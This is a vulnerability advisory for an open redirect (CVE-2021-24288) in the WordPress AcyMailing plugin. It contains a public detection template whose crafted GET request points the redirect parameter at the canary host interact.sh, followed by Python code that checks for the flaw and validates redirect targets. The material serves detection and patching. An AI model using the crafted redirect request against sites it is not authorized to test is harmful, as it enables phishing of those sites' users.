CVE-2021-24288: WordPress AcyMailing <7.5.0 - Open Redirect

Date: 2025-08-01 | Affected software: WordPress AcyMailing | PoC: public

Vulnerability description

WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.

PoC code [public]

id: CVE-2021-24288

info:
  name: WordPress AcyMailing <7.5.0 - Open Redirect
  author: 0x_Akoko
  severity: medium
  description: WordPress AcyMailing plugin before 7.5.0 contains an open redirect vulnerability due to improper sanitization of the redirect parameter. An attacker turning the request from POST to GET can craft a link containing a potentially malicious landing page and send it to the user.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Update the AcyMailing plugin to version 7.5.0 or later to fix the open redirect vulnerability.
  reference:
    - https://wpscan.com/vulnerability/56628862-1687-4862-9ed4-145d8dfbca97
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24288
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24288
    cwe-id: CWE-601
    epss-score: 0.04398
    epss-percentile: 0.88571
    cpe: cpe:2.3:a:acymailing:acymailing:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: acymailing
    product: acymailing
    framework: wordpress
  tags: cve,cve2021,wpscan,wordpress,redirect,wp-plugin,acymailing

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a004730450220743fd51c2924e633b8f26b918a180b00b335a56e1ed0aaaed3be356db09c38b9022100a861410903b10b8a7da1784735b33dd8261726e0532cf020c24902d477aa9cf3:922c64590222798bb761d5b6d8e72950
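The template above only tells you whether a Location header points at the canary host. As an added example that is not part of the template or of the AcyMailing plugin, the Python below reimplements that header check over constructed HTTP responses and, beside it, a same-host validator of the kind the 7.5.0 fix needs for a user-supplied redirect value (the hostname blog.example and the function names are assumptions).

```python
import re
from urllib.parse import urlparse

# Constructed sample responses (not captured from a real site).
SAMPLE_VULNERABLE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://interact.sh\r\n"
    "Content-Length: 0\r\n"
)
SAMPLE_FIXED = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://blog.example/index.php?page=acymailing_front\r\n"
)


def redirects_to_canary(raw_headers: str, canary: str = "interact.sh") -> bool:
    """Same logic as the template's matcher: True when a Location header
    sends the browser to the canary host (absolute, protocol-relative or bare)."""
    pattern = re.compile(
        r"(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)"
        + re.escape(canary)
        + r".*$"
    )
    return pattern.search(raw_headers) is not None


def safe_redirect_target(redirect: str, site_host: str, default: str = "/") -> str:
    """Hardened handling of the redirect parameter (assumed fix, not the
    plugin's own code). Accepts only site-local paths or absolute URLs whose
    host is exactly this site; anything else falls back to `default`."""
    parsed = urlparse(redirect)
    if parsed.scheme or parsed.netloc:
        # Absolute URL or protocol-relative "//host": require http(s) and our own
        # hostname. `hostname` strips userinfo and port, so "https://ours@evil"
        # compares as "evil", not "ours".
        if parsed.scheme in ("http", "https") and parsed.hostname == site_host.lower():
            return redirect
        return default
    # Path-only values: reject "//host" and "/\host", which browsers treat as
    # scheme-relative redirects to another origin.
    if redirect.startswith("/") and not redirect.startswith(("//", "/\\")):
        return redirect
    return default
```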
